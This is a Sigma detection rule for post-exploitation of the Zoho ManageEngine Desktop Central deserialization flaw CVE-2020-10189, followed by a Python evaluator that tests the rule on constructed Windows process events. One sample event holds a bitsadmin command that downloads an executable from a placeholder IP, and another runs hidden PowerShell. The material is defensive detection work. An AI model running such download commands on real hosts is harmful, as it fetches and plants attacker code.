title: Exploited CVE-2020-10189 Zoho ManageEngine
id: 846b866e-2a57-46ee-8e16-85fa92759be7
status: experimental
description: Detects post-exploitation activity of the Zoho ManageEngine Desktop Central Java deserialization vulnerability CVE-2020-10189, namely a command interpreter or bitsadmin being spawned by the Desktop Central Java process
references:
    - https://www.fireeye.com/blog/threat-research/2020/03/apt41-initiates-global-intrusion-campaign-using-multiple-exploits.html
    - https://nvd.nist.gov/vuln/detail/CVE-2020-10189
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-10189
    - https://vulmon.com/exploitdetails?qidtp=exploitdb&qid=48224
author: Florian Roth
date: 2020/03/25
tags:
    - attack.initial_access
    - attack.t1190
    - attack.execution
    - attack.t1059.001
    - attack.t1086  # an old one
    - attack.t1059.003
    - attack.t1059  # an old one
    - attack.s0190
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        ParentImage|endswith: 'DesktopCentral_Server\jre\bin\java.exe'
        Image|endswith:
            - '\cmd.exe'
            - '\powershell.exe'
            - '\bitsadmin.exe'
    condition: selection
falsepositives:
    - Unknown
level: critical
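The following is an added example, not part of the Sigma rule or of the SigmaHQ project: a small Python evaluator that applies the rule's `selection` map to a handful of constructed Sysmon-style process_creation events, so you can see which records the rule alerts on and which it ignores. Field names (`ParentImage`, `Image`, `CommandLine`), all paths and the IP address in the events are made up for the example; the matching semantics (case-insensitive, map keys AND-ed, list values OR-ed, `endswith` as a plain suffix test) follow the Sigma specification.

```python
"""Evaluate the Sigma selection above against constructed process_creation events."""
from fnmatch import fnmatchcase
from typing import Dict, List, Optional

# The rule's selection, transcribed from the YAML: every key must match (AND),
# a list of values matches if any one of them matches (OR).
SELECTION: Dict[str, List[str]] = {
    "ParentImage|endswith": [r"DesktopCentral_Server\jre\bin\java.exe"],
    "Image|endswith": [r"\cmd.exe", r"\powershell.exe", r"\bitsadmin.exe"],
}

# Constructed Sysmon-style Event ID 1 records. Paths, command lines and the
# IP address are invented for this example, not taken from a real intrusion.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"ParentImage": r"C:\ManageEngine\DesktopCentral_Server\jre\bin\java.exe",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd.exe /c whoami"},
    # Upper-case image name: Sigma matching is case-insensitive, so this still hits.
    {"ParentImage": r"C:\ManageEngine\DesktopCentral_Server\jre\bin\java.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\POWERSHELL.EXE",
     "CommandLine": "POWERSHELL.EXE -nop -w hidden -c whoami"},
    {"ParentImage": r"C:\ManageEngine\DesktopCentral_Server\jre\bin\java.exe",
     "Image": r"C:\Windows\System32\bitsadmin.exe",
     "CommandLine": r"bitsadmin /transfer j /download http://198.51.100.7/s.exe C:\Users\Public\s.exe"},
    # Benign: the Desktop Central Java process starting a non-interpreter child.
    {"ParentImage": r"C:\ManageEngine\DesktopCentral_Server\jre\bin\java.exe",
     "Image": r"C:\ManageEngine\DesktopCentral_Server\bin\wrapper.exe",
     "CommandLine": "wrapper.exe -s"},
    # Benign: cmd.exe with an unrelated parent.
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd.exe"},
]


def value_matches(value: str, modifier: Optional[str], patterns: List[str]) -> bool:
    """Sigma string matching: case-insensitive; without a modifier the whole
    value must match, with '*' and '?' acting as wildcards."""
    v = value.lower()
    for raw in patterns:
        p = raw.lower()
        if modifier == "endswith":
            hit = v.endswith(p)
        elif modifier == "startswith":
            hit = v.startswith(p)
        elif modifier == "contains":
            hit = p in v
        elif modifier is None:
            hit = fnmatchcase(v, p)
        else:
            raise ValueError(f"unsupported modifier: {modifier}")
        if hit:
            return True
    return False


def selection_matches(event: Dict[str, str], selection: Dict[str, List[str]]) -> bool:
    """All field conditions in a selection map must hold (logical AND)."""
    for key, patterns in selection.items():
        field, _, modifier = key.partition("|")
        value = event.get(field)
        if value is None or not value_matches(value, modifier or None, patterns):
            return False
    return True


def run_rule(events: List[Dict[str, str]]) -> List[Dict[str, str]]:
    """'condition: selection': every event satisfying the selection is an alert."""
    return [e for e in events if selection_matches(e, SELECTION)]


if __name__ == "__main__":
    for hit in run_rule(SAMPLE_EVENTS):
        print("ALERT:", hit["Image"], "<-", hit["ParentImage"], "|", hit["CommandLine"])
```

Three of the five constructed events alert: the child processes of the Desktop Central `java.exe` that are `cmd.exe`, `powershell.exe` or `bitsadmin.exe`. The Java process starting some other binary, and a shell started by any other parent, pass silently; the rule keys on the parent-child pair, not on the interpreter alone. Note that `endswith` takes a plain suffix with no leading `*`; a wildcard is only needed for unmodified values.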